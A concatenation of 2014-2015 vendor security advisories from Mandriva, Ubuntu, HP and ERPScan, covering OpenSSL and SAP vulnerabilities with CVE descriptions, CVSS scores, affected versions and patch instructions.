http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293
http://openssl.org/news/secadv_20150108.txt
http://openssl.org/news/secadv_20150319.txt
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm
9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm
58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm
b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm
a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm
521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS
kz0ex6eI6hA6qSwklA2NoXY=
=GYjX
-----END PGP SIGNATURE-----
. ============================================================================
Ubuntu Security Notice USN-2459-1
January 12, 2015
openssl vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL.
Software Description:
- openssl: Secure Socket Layer (SSL) cryptographic library and tools
Details:
Pieter Wuille discovered that OpenSSL incorrectly handled Bignum squaring.
(CVE-2014-3570)
Markus Stenberg discovered that OpenSSL incorrectly handled certain crafted
DTLS messages. (CVE-2014-3571)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain
handshakes. (CVE-2014-3572)
Antti Karjalainen, Tuomo Untinen and Konrad Kraszewski discovered that
OpenSSL incorrectly handled certain certificate fingerprints. (CVE-2014-8275)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain
key exchanges. (CVE-2015-0204)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled client
authentication.
This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. This issue
only affected Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 14.10.
(CVE-2015-0206)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
libssl1.0.0 1.0.1f-1ubuntu9.1
Ubuntu 14.04 LTS:
libssl1.0.0 1.0.1f-1ubuntu2.8
Ubuntu 12.04 LTS:
libssl1.0.0 1.0.1-4ubuntu5.21
Ubuntu 10.04 LTS:
libssl0.9.8 0.9.8k-7ubuntu8.23
After a standard system update you need to reboot your computer to make
all the necessary changes. SAP <http://www.sap.com/>has released the monthly critical patch update
for June 2015. This patch update closes a lot of vulnerabilities in SAP
products. The most popular vulnerability is Missing Authorization Check.
This month, three critical vulnerabilities found by ERPScan researchers
Vahagn Vardanyan, Rustem Gazizov, and Diana Grigorieva were closed.
*Issues that were patched with the help of ERPScan*
Below are the details of SAP vulnerabilities that were found byERPScan
<http://www.erpscan.com/>researchers.
* An XML eXternal Entity vulnerability in SAP Mobile Platform
on-premise (CVSS Base Score:5.5).Updateis available in SAP Security
Note2159601 <https://service.sap.com/sap/support/notes/2159601>. An
attacker can use XML eXternal Entities to send specially crafted
unauthorized XML requests, which will be processed by the XML
parser. The attacker will get unauthorized access to the OS file system.
* A Hardcoded Credentials vulnerability in SAP Cross-System Tools
(CVSS Base Score:3.6).Updateis available in SAP Security Note2059659
<https://service.sap.com/sap/support/notes/2059659>. In addition, it is likely that the
code will be implemented as a backdoor into the system.
* A Hardcoded Credentials vulnerability in SAP Data Transfer Workbench
(CVSS Base Score:2.1).Updateis available in SAP Security Note2057982
<https://service.sap.com/sap/support/notes/2057982>. In addition, it is likely that the
code will be implemented as a backdoor into the system.
*The most critical issues found by other researchers*
Some of our readers and clients asked us to categorize the most critical
SAP vulnerabilities to patch them first. Companies providing SAP
Security Audit, SAP Security Assessment, or SAP Penetration Testing
services can include these vulnerabilities in their checklists. The most
critical vulnerabilities of this update can be patched by the following
SAP Security Notes:
* 2151237 <https://service.sap.com/sap/support/notes/2151237>: SAP GUI
for Windows has a Buffer Overflow vulnerability (CVSS Base
Score:9.3). An attacker can use Buffer Overflow for injecting
specially crafted code into working memory, which will be executed
by the vulnerable application under the privileges of that
application. This can lead to the attacker taking complete control
over the application, denial of service, command execution, and
other attacks. In case of command execution,attackercan obtain
critical technical and business-related information stored in the
vulnerable SAP-system or escalate their own privileges. As for
denial of service, the process of the vulnerable component may be
terminated. For this time, nobody will be able to use this service,
which negatively influences business processes, system downtime,
and, consequently, business reputation. It is recommended to install
this SAP Security Note to prevent risks.
* 2129609 <https://service.sap.com/sap/support/notes/2129609>: SAP EP
JDBC Connector has an SQL Injection vulnerability (CVSS Base
Score:6.5). An attacker can use SQL Injections with the help of
specially crafted SQL queries. They can read and modify sensitive
information from a database, execute administrative operations in a
database, destroy data or make it unavailable. In some cases, an
attacker can access system data or execute OS commands. It is
recommended to install this SAP Security Note to prevent risks.
* 1997734 <https://service.sap.com/sap/support/notes/1997734>: SAP RFC
runtime has a Missing AuthorizationXheckvulnerability (CVSS Base
Score:6.0). An attacker can use Missing Authorization Checks to
access a service without any authorization procedures and use
service functionality that has restricted access. It
is recommended to install this SAP Security Note to prevent risks.
* 2163306 <https://service.sap.com/sap/support/notes/2163306>: SAP
CommonCryptoLib and SAPCRYPTOLIB are vulnerable to FREAK
(CVE-2015-0204, CVSS Base Score:5.0). It allows an attacker to
intercept HTTPS connections between vulnerable clients and servers
and force them to use weakened encryption, which the attacker can
break to steal or manipulate sensitive data. All the attacks on this
page assume a network adversary (i.e. a man-in-the-middle) to tamper
with TLS handshake messages. The typical scenario to mount such
attacks is by tampering with the Domain Name System (DNS), for
example via DNS rebinding or domain name seizure. This attack
targets a class of deliberately weak export cipher suites. It is
recommended to install this SAP Security Note to prevent risks.
*References about the FREAK vulnerability:*
* SMACK: State Machine AttaCKs <https://www.smacktls.com/>
* Tracking the FREAK Attack <https://freakattack.com/>
* CVE-2015-0204
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204>
It is highly recommended to patch all those SAP vulnerabilities to
prevent business risks affecting your SAP systems.
SAP has traditionally thanked the security researchers from ERPScan for
found vulnerabilities on theiracknowledgment page
<http://scn.sap.com/docs/DOC-8218>.
Advisories for those SAP vulnerabilities with technical details will be
available in 3 months onerpscan.com <http://www.erpscan.com/>.
--
Darya Maenkova
PR manager
<https://www.linkedin.com/company/2217474?trk=ppro_cprof>
<https://twitter.com/erpscan>
<http://erpscan.com/>
------------------------------------------------------------------------
e-mail: d.maenkova@erpscan.com <mailto:d.maenkova@erpscan.com>
address: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
phone: 650.798.5255
erpscan.com <http://erpscan.com>
.
Release Date: 2015-02-25
Last Updated: 2015-02-25
Potential Security Impact: Remote Denial of Service (DoS) and other
vulnerabilites
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX running
OpenSSL.
References:
CVE-2014-8275 Cryptographic Issues (CWE-310)
CVE-2014-3569 Remote Denial of Service (DoS)
CVE-2014-3570 Cryptographic Issues (CWE-310)
CVE-2014-3571 Remote Denial of Service (DoS)
CVE-2014-3572 Cryptographic Issues (CWE-310)
CVE-2015-0204 Cryptographic Issues (CWE-310)
SSRT101885
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL versions before v0.9.8ze
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-0204 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following updates to resolve these vulnerabilities. The
updates are available from either of the following sites:
ftp://sl098ze:Secure12@h2.usa.hp.com
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber
=OPENSSL11I
HP-UX Release
HP-UX OpenSSL depot name
B.11.11 (11i v1)
OpenSSL_A.00.09.08ze.001_HP-UX_B.11.11_32_64.depot
B.11.23 (11i v2)
OpenSSL_A.00.09.08ze.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (11i v3)
OpenSSL_A.00.09.08ze.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08ze or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
==================
openssl.OPENSSL-CER
openssl.OPENSSL-CONF
openssl.OPENSSL-DOC
openssl.OPENSSL-INC
openssl.OPENSSL-LIB
openssl.OPENSSL-MAN
openssl.OPENSSL-MIS
openssl.OPENSSL-PRNG
openssl.OPENSSL-PVT
openssl.OPENSSL-RUN
openssl.OPENSSL-SRC
action: install revision A.00.09.08ze.001 or subsequent
HP-UX B.11.23
==================
openssl.OPENSSL-CER
openssl.OPENSSL-CONF
openssl.OPENSSL-DOC
openssl.OPENSSL-INC
openssl.OPENSSL-LIB
openssl.OPENSSL-MAN
openssl.OPENSSL-MIS
openssl.OPENSSL-PRNG
openssl.OPENSSL-PVT
openssl.OPENSSL-RUN
openssl.OPENSSL-SRC
action: install revision A.00.09.08ze.002 or subsequent
HP-UX B.11.31
==================
openssl.OPENSSL-CER
openssl.OPENSSL-CONF
openssl.OPENSSL-DOC
openssl.OPENSSL-INC
openssl.OPENSSL-LIB
openssl.OPENSSL-MAN
openssl.OPENSSL-MIS
openssl.OPENSSL-PRNG
openssl.OPENSSL-PVT
openssl.OPENSSL-RUN
openssl.OPENSSL-SRC
action: install revision A.00.09.08ze.003 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 25 February 2015 Initial release
Version:2 (rev.2) - 25 February 2015 Corrected bulletin number
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners
| VAR-201501-0339 | CVE-2015-0205 | OpenSSL CVE-2015-0205 Man in the Middle Security Bypass Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support. OpenSSL is prone to security-bypass vulnerability.
Successfully exploiting these issues may allow attackers to perform unauthorized actions by conducting a man-in-the-middle attack. This may lead to other attacks. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2015:062
http://www.mandriva.com/en/support/security/
_______________________________________________________________________
Package : openssl
Date : March 27, 2015
Affected: Business Server 2.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities has been discovered and corrected in openssl:
Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL
through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows
remote attackers to inject data across sessions or cause a denial of
service (use-after-free and parsing error) via an SSL connection in
a multithreaded environment (CVE-2010-5298).
The Montgomery ladder implementation in OpenSSL through 1.0.0l does
not ensure that certain swap operations have a constant-time behavior,
which makes it easier for local users to obtain ECDSA nonces via a
FLUSH+RELOAD cache side-channel attack (CVE-2014-0076).
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before
1.0.1g do not properly handle Heartbeat Extension packets, which allows
remote attackers to obtain sensitive information from process memory
via crafted packets that trigger a buffer over-read, as demonstrated
by reading private keys, related to d1_both.c and t1_lib.c, aka the
Heartbleed bug (CVE-2014-0160).
The dtls1_reassemble_fragment function in d1_both.c in OpenSSL
before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does
not properly validate fragment lengths in DTLS ClientHello messages,
which allows remote attackers to execute arbitrary code or cause a
denial of service (buffer overflow and application crash) via a long
non-initial fragment (CVE-2014-0195).
The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g,
when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a
buffer pointer during certain recursive calls, which allows remote
attackers to cause a denial of service (NULL pointer dereference
and application crash) via vectors that trigger an alert condition
(CVE-2014-0198).
The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL
before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when
an anonymous ECDH cipher suite is used, allows remote attackers to
cause a denial of service (NULL pointer dereference and client crash)
by triggering a NULL certificate value (CVE-2014-3470).
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
products, uses nondeterministic CBC padding, which makes it easier
for man-in-the-middle attackers to obtain cleartext data via a
padding-oracle attack, aka the POODLE issue (CVE-2014-3566).
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL
0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to
use unsupported protocols, which allows remote attackers to cause a
denial of service (NULL pointer dereference and daemon crash) via
an unexpected handshake, as demonstrated by an SSLv3 handshake to
a no-ssl3 application with certain error handling. NOTE: this issue
became relevant after the CVE-2014-3568 fix (CVE-2014-3569).
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before
1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square
of a BIGNUM value, which might make it easier for remote attackers to
defeat cryptographic protection mechanisms via unspecified vectors,
related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and
crypto/bn/bn_asm.c (CVE-2014-3570).
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k
allows remote attackers to cause a denial of service (NULL pointer
dereference and application crash) via a crafted DTLS message that
is processed with a different read operation for the handshake header
than for the handshake body, related to the dtls1_get_record function
in d1_pkt.c and the ssl3_read_n function in s3_pkt.c (CVE-2014-3571).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before
0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote
SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger
a loss of forward secrecy by omitting the ServerKeyExchange message
(CVE-2014-3572).
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k
does not enforce certain constraints on certificate data, which allows
remote attackers to defeat a fingerprint-based certificate-blacklist
protection mechanism by including crafted data within a
certificate's unsigned portion, related to crypto/asn1/a_verify.c,
crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c
(CVE-2014-8275).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before
0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL
servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate
brute-force decryption by offering a weak ephemeral RSA key in a
noncompliant role, related to the FREAK issue. NOTE: the scope of
this CVE is only client code based on OpenSSL, not EXPORT_RSA issues
associated with servers or other TLS implementations (CVE-2015-0204).
Memory leak in the dtls1_buffer_record function in d1_pkt.c in OpenSSL
1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k allows remote attackers
to cause a denial of service (memory consumption) by sending many
duplicate records for the next epoch, leading to failure of replay
detection (CVE-2015-0206).
Use-after-free vulnerability in the d2i_ECPrivateKey function in
crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r,
1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote
attackers to cause a denial of service (memory corruption and
application crash) or possibly have unspecified other impact via a
malformed Elliptic Curve (EC) private-key file that is improperly
handled during import (CVE-2015-0209).
The ASN1_TYPE_cmp function in crypto/asn1/a_type.c in OpenSSL before
0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before
1.0.2a does not properly perform boolean-type comparisons, which allows
remote attackers to cause a denial of service (invalid read operation
and application crash) via a crafted X.509 certificate to an endpoint
that uses the certificate-verification feature (CVE-2015-0286).
The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL
before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2
before 1.0.2a does not reinitialize CHOICE and ADB data structures,
which might allow attackers to cause a denial of service (invalid
write operation and memory corruption) by leveraging an application
that relies on ASN.1 structure reuse (CVE-2015-0287).
The X509_to_X509_REQ function in crypto/x509/x509_req.c in OpenSSL
before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2
before 1.0.2a might allow attackers to cause a denial of service
(NULL pointer dereference and application crash) via an invalid
certificate key (CVE-2015-0288).
The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before
1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not
properly handle a lack of outer ContentInfo, which allows attackers to
cause a denial of service (NULL pointer dereference and application
crash) by leveraging an application that processes arbitrary PKCS#7
data and providing malformed data with ASN.1 encoding, related to
crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289).
The updated packages have been upgraded to the 1.0.1m version where
these security flaws has been fixed.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293
http://openssl.org/news/secadv_20150108.txt
http://openssl.org/news/secadv_20150319.txt
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm
9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm
58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm
b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm
a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm
521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS
kz0ex6eI6hA6qSwklA2NoXY=
=GYjX
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04774019
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04774019
Version: 1
HPSBMU03409 rev.1 - HP Matrix Operating Environment, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2015-08-24
Last Updated: 2015-08-24
Potential Security Impact: Remote unauthorized modification, unauthorized
access, or unauthorized disclosure of information.
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Matrix
Operating Environment. The vulnerabilities could be exploited remotely
resulting in unauthorized modification, unauthorized access, or unauthorized
disclosure of information.
References:
CVE-2010-5107
CVE-2013-0248
CVE-2014-0118
CVE-2014-0226
CVE-2014-0231
CVE-2014-1692
CVE-2014-3523
CVE-2014-3569
CVE-2014-3570
CVE-2014-3571
CVE-2014-3572
CVE-2014-8142
CVE-2014-8275
CVE-2014-9427
CVE-2014-9652
CVE-2014-9653
CVE-2014-9705
CVE-2015-0204
CVE-2015-0205
CVE-2015-0206
CVE-2015-0207
CVE-2015-0208
CVE-2015-0209
CVE-2015-0231
CVE-2015-0232
CVE-2015-0273
CVE-2015-0285
CVE-2015-0286
CVE-2015-0287
CVE-2015-0288
CVE-2015-0289
CVE-2015-0290
CVE-2015-0291
CVE-2015-0292
CVE-2015-0293
CVE-2015-1787
CVE-2015-1788
CVE-2015-1789
CVE-2015-1790
CVE-2015-1791
CVE-2015-1792
CVE-2015-2134
CVE-2015-2139
CVE-2015-2140
CVE-2015-2301
CVE-2015-2331
CVE-2015-2348
CVE-2015-2787
CVE-2015-3113
CVE-2015-5122
CVE-2015-5123
CVE-2015-5402
CVE-2015-5403
CVE-2015-5404
CVE-2015-5405
CVE-2015-5427
CVE-2015-5428
CVE-2015-5429
CVE-2015-5430
CVE-2015-5431
CVE-2015-5432
CVE-2015-5433
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Matrix Operating Environment impacted software components and versions:
HP Systems Insight Manager (SIM) prior to version 7.5.0
HP System Management Homepage (SMH) prior to version 7.5.0
HP Version Control Agent (VCA) prior to version 7.5.0
HP Version Control Repository Manager (VCRM) prior to version 7.5.0
HP Insight Orchestration prior to version 7.5.0
HP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3
CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6
CVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
